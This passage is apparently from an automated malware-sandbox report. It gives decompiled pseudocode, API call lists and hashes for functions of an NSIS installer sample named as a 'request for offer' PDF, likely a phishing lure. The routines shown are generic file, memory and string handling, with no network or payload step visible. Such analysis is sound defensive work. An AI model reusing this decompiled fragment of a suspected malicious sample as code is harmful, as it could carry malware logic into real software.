						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[6] = _t42;
							goto L12;
						} else {
							_t38 = E100012BA(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t38 = E10001243();
						L11:
						_t52 = _t38;
						L12:
						_t13 =  &(_t51[2]); // 0x1020
						_t43 = _t13;
						if(_t51[1] != 0xffffffff) {
						}
						_t39 =  *_t51;
						_t51[7] = _t51[7] & 0x00000000;
						if(_t39 > 7) {
							L27:
							_t40 = GlobalFree(_t52);
							if( *(_t54 + 0x10) == 0) {
								return _t40;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t39 * 4 +  &M1000244C))) {
								case 0:
									 *_t43 =  *_t43 & 0x00000000;
									goto L27;
								case 1:
									__eax = E10001311(__ebp);
									goto L21;
								case 2:
									 *__edi = E10001311(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x1000406c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x1000406c, __eax,  *0x1000406c, 0, 0);
									goto L27;
								case 4:
									__eax = E1000122C(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if(lstrlenW(__ebp) > 0) {
										__eax = E10001311(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x1000406c =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
									 *__ebx =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
									asm("cdq");
									__eax = E10001470(__edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18, __edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2);
									goto L27;
							}
						}
					}
					L9:
					_t38 = E1000122C(0x10004044);
					goto L10;
				}
			}

0x100022e4
0x100022e8
0x100022f3
0x100022f3
0x100022fa
0x100022ff
0x00000000
0x00000000
0x10002303
0x10002306
0x00000000
0x00000000
0x1000230b
0x10002316
0x10002326
0x00000000
0x1000231d
0x1000231f
0x10002335
0x00000000
0x10002335
0x1000230d
0x1000230d
0x10002336
0x10002336
0x10002338
0x1000233c
0x1000233c
0x1000233f
0x1000233f
0x10002347
0x10002349
0x10002350
0x10002415
0x10002416
0x10002421
0x1000244b
0x1000244b
0x10002431
0x1000243d
0x10002433
0x10002433
0x10002433
0x00000000
0x10002356
0x10002356
0x00000000
0x1000235d
0x00000000
0x00000000
0x10002366
0x00000000
0x00000000
0x10002374
0x10002376
0x00000000
0x00000000
0x10002397
0x1000239d
0x100023a0
0x100023a2
0x100023b2
0x00000000
0x00000000
0x1000237f
0x10002384
0x10002387
0x10002388
0x00000000
0x00000000
0x100023be
0x100023c4
0x100023c5
0x100023c8
0x100023c9
0x100023cb
0x00000000
0x00000000
0x100023dc
0x100023df
0x100023eb
0x100023ed
0x00000000
0x00000000
0x100023f9
0x10002405
0x10002408
0x1000240a
0x1000240d
0x00000000
0x00000000
0x10002356
0x10002350
0x1000232b
0x10002330
0x00000000
0x10002330

APIs

GlobalFree.KERNEL32(00000000), ref: 10002416

Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C

GlobalAlloc.KERNEL32(00000040), ref: 10002397
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2

Memory Dump Source

Source File: 00000002.00000002.54387884763.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.54387828656.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.54387928274.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.54387958519.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61

Uniqueness

Uniqueness Score: -1.00%

Function 100024A9 Relevance: 9.1, APIs: 6, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E100024A9(intOrPtr* _a4) {
				intOrPtr _v4;
				intOrPtr* _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t35;
				void* _t39;
				intOrPtr _t40;
				void* _t43;

				_t39 = E1000121B();
				_t24 = _a4;
				_t40 =  *((intOrPtr*)(_t24 + 0x1014));
				_v4 = _t40;
				_t43 = (_t40 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) != 0xffffffff) {
					}
					_t35 =  *(_t43 - 8);
					if(_t35 <= 7) {
						switch( *((intOrPtr*)(_t35 * 4 +  &M100025B9))) {
							case 0:
								 *_t39 =  *_t39 & 0x00000000;
								goto L15;
							case 1:
								_push( *__eax);
								goto L13;
							case 2:
								__eax = E10001470(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L14;
							case 3:
								__ecx =  *0x1000406c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(0, 0,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x1000406c;
								 *(__edi + __eax * 2 - 2) =  *(__edi + __eax * 2 - 2) & 0x00000000;
								goto L15;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x1000406c);
								goto L15;
							case 5:
								_push( *0x1000406c);
								_push(__edi);
								_push( *__eax);
								__imp__StringFromGUID2();
								goto L15;
							case 6:
								_push( *__esi);
								L13:
								__eax = wsprintfW(__edi, __ebp);
								L14:
								__esp = __esp + 0xc;
								goto L15;
						}
					}
					L15:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E100012E1(_t27 - 1, _t39);
								goto L24;
							}
						} else {
							E10001272(_t39);
							L24:
						}
					}
					_v4 = _v4 - 1;
					_t43 = _t43 - 0x20;
				} while (_v4 >= 0);
				return GlobalFree(_t39);
			}

0x100024b3
0x100024b5
0x100024c4
0x100024ca
0x100024d7
0x100024d9
0x100024dd
0x100024dd
0x100024e5
0x100024eb
0x100024ed
0x00000000
0x100024f4
0x00000000
0x00000000
0x100024fa
0x00000000
0x00000000
0x10002504
0x00000000
0x00000000
0x1000250b
0x10002511
0x1000251d
0x10002523
0x10002528
0x00000000
0x00000000
0x1000254a
0x00000000
0x00000000
0x10002530
0x10002536
0x10002537
0x10002539
0x00000000
0x00000000
0x10002552
0x10002554
0x10002556
0x10002558
0x10002558
0x00000000
0x00000000
0x100024ed
0x1000255b
0x1000255b
0x10002560
0x10002572
0x10002572
0x10002578
0x1000257d
0x10002582
0x1000258e
0x10002593
0x00000000
0x10002598
0x10002584
0x10002585
0x10002599
0x10002599
0x10002582
0x1000259a
0x1000259e
0x100025a1
0x100025b8

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

GlobalFree.KERNEL32(?), ref: 10002572
GlobalFree.KERNEL32(00000000), ref: 100025AD

Memory Dump Source

Source File: 00000002.00000002.54387884763.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.54387828656.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.54387928274.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.54387958519.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69

Uniqueness

Uniqueness Score: -1.00%

Function 004028C3 Relevance: 9.1, APIs: 6, Instructions: 86
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004028C3(void* __ebx) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0x30)) = 0xfffffd66;
				_t50 = E00402C53(0xfffffff0);
				 *(_t56 - 0x40) = _t23;
				if(E00405C3D(_t50) == 0) {
					E00402C53(0xffffffed);
				}
				E00405DC2(_t50);
				_t26 = E00405DE7(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x42a254;
					 *(_t56 - 0x38) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E00403402(_t45);
						E004033EC(_t49,  *(_t56 - 0x38));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x50) = _t54;
						if(_t54 != _t45) {
							E0040317B(_t47,  *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x34) =  *_t54;
								E00405DA2( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x34);
							}
							GlobalFree( *(_t56 - 0x50));
						}
						E00405E99( *(_t56 + 8), _t49,  *(_t56 - 0x38));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0x30)) = E0040317B(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0x30)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileW( *(_t56 - 0x40));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}

0x004028c3
0x004028c5
0x004028d1
0x004028d4
0x004028de
0x004028e2
0x004028e2
0x004028e8
0x004028f5
0x004028fd
0x00402900
0x00402906
0x00402914
0x00402919
0x0040291d
0x00402920
0x00402929
0x00402935
0x00402939
0x0040293c
0x00402946
0x00402965
0x0040294d
0x00402952
0x0040295a
0x0040295d
0x00402962
0x00402962
0x0040296c
0x0040296c
0x00402979
0x0040297f
0x00402991
0x00402991
0x00402997
0x00402997
0x004029a2
0x004029a3
0x004029a7
0x004029ab
0x004029b1
0x004029b1
0x004029b8
0x0040224b
0x00402ade
0x00402aea

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402917
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402933
GlobalFree.KERNEL32(?), ref: 0040296C
GlobalFree.KERNEL32(00000000), ref: 0040297F
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402997
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 004029AB

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 364cdaa611351f703cd1bca6674fb989e6e16abe5aa745253ea670e3687e1c0d
Instruction ID: 8996c306b55a9cd0cf00445349fd93af405541c9de08eca1dd931963291c836b
Opcode Fuzzy Hash: 364cdaa611351f703cd1bca6674fb989e6e16abe5aa745253ea670e3687e1c0d
Instruction Fuzzy Hash: C221BF71800124BBDF116FA5CE49D9E7E79EF09364F10423EF8507A2E0CB794D418B98

Uniqueness

Uniqueness Score: -1.00%

Function 00404B2D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404B2D(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E00406234(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E00406234(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E00406234(_t44, _t50, 0x423728, 0x423728, _a8);
				wsprintfW(_t34 + lstrlenW(0x423728) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x429218, _a4, 0x423728);
			}

0x00404b36
0x00404b3b
0x00404b43
0x00404b44
0x00404b51
0x00404b59
0x00404b5a
0x00404b5c
0x00404b5e
0x00404b60
0x00404b63
0x00404b63
0x00404b6a
0x00404b70
0x00404b70
0x00404b77
0x00404b7e
0x00404b81
0x00404b84
0x00404b84
0x00404b88
0x00404b98
0x00404b9a
0x00404b9d
0x00404b46
0x00404b46
0x00404b4d
0x00404b4d
0x00404ba5
0x00404bb0
0x00404bc6
0x00404bd7
0x00404bf3

APIs

lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404BCE
wsprintfW.USER32 ref: 00404BD7
SetDlgItemTextW.USER32(?,00423728), ref: 00404BEA

Strings

(7B, xrefs: 00404BC0
%u.%u%s%s, xrefs: 00404BB8

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$(7B
API String ID: 3540041739-1320723960
Opcode ID: 97f8edb7a0e5a20212aa5a449d05d7effc420c8931a1b74a790ae22a69f051c3
Instruction ID: 06844f863ebb5207f96fa0dde493c575b08da8a3ff5d6269356cbccd3d727cca
Opcode Fuzzy Hash: 97f8edb7a0e5a20212aa5a449d05d7effc420c8931a1b74a790ae22a69f051c3
Instruction Fuzzy Hash: E211D873A0412877DB00666D9C41F9E32989B85374F150237FA25F31D1DA79D81282E9

Uniqueness

Uniqueness Score: -1.00%

Function 004025AE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E004025AE(int __ebx, void* __edx, intOrPtr* __esi) {
				signed int _t14;
				int _t17;
				int _t24;
				signed int _t29;
				intOrPtr* _t32;
				void* _t34;
				void* _t35;
				void* _t38;
				signed int _t40;

				_t32 = __esi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x20);
				_t38 = __edx - 0x38;
				 *(_t35 - 0x50) = _t14;
				_t27 = 0 | _t38 == 0x00000000;
				_t29 = _t38 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402C53(0x11)) + _t16;
					} else {
						E00402C53(0x21);
						WideCharToMultiByte(__ebx, __ebx, "C:\Users\Arthur\AppData\Local\Temp\nsq493.tmp", 0xffffffff, "C:\Users\Arthur\AppData\Local\Temp\nsq493.tmp\System.dll", 0x400, __ebx, __ebx);
						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nsq493.tmp\System.dll");
					}
				} else {
					E00402C31(1);
					 *0x40add8 = __ax;
					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t32 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t34 = E00406172(_t27, _t32);
					if((_t29 |  *(_t35 - 0x50)) != 0 ||  *((intOrPtr*)(_t35 - 0x1c)) == _t24 || E00405EC8(_t34, _t34) >= 0) {
						_t14 = E00405E99(_t34, "C:\Users\Arthur\AppData\Local\Temp\nsq493.tmp\System.dll",  *(_t35 + 8));
						_t40 = _t14;
						if(_t40 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x004025ae
0x004025ae
0x004025ae
0x004025b3
0x004025b6
0x004025b9
0x004025be
0x004025c0
0x004025e0
0x0040261e
0x004025e2
0x004025e4
0x004025fe
0x00402609
0x00402609
0x004025c2
0x004025c4
0x004025c9
0x004025d7
0x004025da
0x00402623
0x00402626
0x004028a1
0x004028a1
0x0040262c
0x00402635
0x00402637
0x00402656
0x004015b4
0x004015b6
0x00000000
0x004015bc
0x00000000
0x00000000
0x00000000
0x00402637
0x00402ade
0x00402aea

APIs

WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsq493.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll,00000400,?,?,00000021), ref: 004025FE
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsq493.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll,00000400,?,?,00000021), ref: 00402609

Strings

C:\Users\user\AppData\Local\Temp\nsq493.tmp, xrefs: 004025F7
C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll, xrefs: 004025C9, 004025F0, 00402604, 00402650

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsq493.tmp$C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll
API String ID: 3109718747-1219445975
Opcode ID: 54d7f994a71c40522fb0301f4e4a50dd5d806bffb1b4e71dc221b53e9a18cde7
Instruction ID: 0226f840347654c2ecdc96a32175c32971a63fe26a5c545fd31e5d705646dbf5
Opcode Fuzzy Hash: 54d7f994a71c40522fb0301f4e4a50dd5d806bffb1b4e71dc221b53e9a18cde7
Instruction Fuzzy Hash: CE11C872A05714BADB106BB18E8999E7765AF00359F20453FF102F61C1DAFC8982575E

Uniqueness

Uniqueness Score: -1.00%

Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100015FF(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}

0x10001619
0x10001625
0x10001632
0x10001639
0x10001642
0x1000164e

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
GlobalFree.KERNEL32(00000000), ref: 10001642

Memory Dump Source

Source File: 00000002.00000002.54387884763.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.54387828656.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.54387928274.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.54387958519.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1

Uniqueness

Uniqueness Score: -1.00%

Function 00405CCE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405CCE(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406212(0x425f30, _a4);
				_t21 = E00405C71(0x425f30);
				if(_t21 != 0) {
					E004064A6(_t21);
					if(( *0x42a258 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425f30 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425f30);
							_push(0x425f30);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E00406555();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405C12(0x425f30);
								continue;
							} else {
								goto L1;
							}
						}
						E00405BC6();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00405cda
0x00405ce5
0x00405ce9
0x00405cf0
0x00405cfc
0x00405d0c
0x00405d0e
0x00405d26
0x00405d27
0x00405d2e
0x00405d2f
0x00000000
0x00000000
0x00405d12
0x00405d19
0x00405d21
0x00000000
0x00000000
0x00000000
0x00000000
0x00405d19
0x00405d31
0x00000000
0x00405d45
0x00405cfe
0x00405d04
0x00000000
0x00000000
0x00000000
0x00000000
0x00405d04
0x00405ceb
0x00000000

APIs

Part of subcall function 00406212: lstrcpynW.KERNEL32(?,?,00000400,004034F7,00429240,NSIS Error), ref: 0040621F

Part of subcall function 00405C71: CharNextW.USER32(?,?,00425F30,?,00405CE5,00425F30,00425F30, 4t.t,?,74E02EE0,00405A23,?,74E03420,74E02EE0,00000000), ref: 00405C7F
Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C84
Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C9C

lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30, 4t.t,?,74E02EE0,00405A23,?,74E03420,74E02EE0,00000000), ref: 00405D27
GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30, 4t.t,?,74E02EE0,00405A23,?,74E03420,74E02EE0), ref: 00405D37

Strings

4t.t, xrefs: 00405CD0
0_B, xrefs: 00405CD4

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
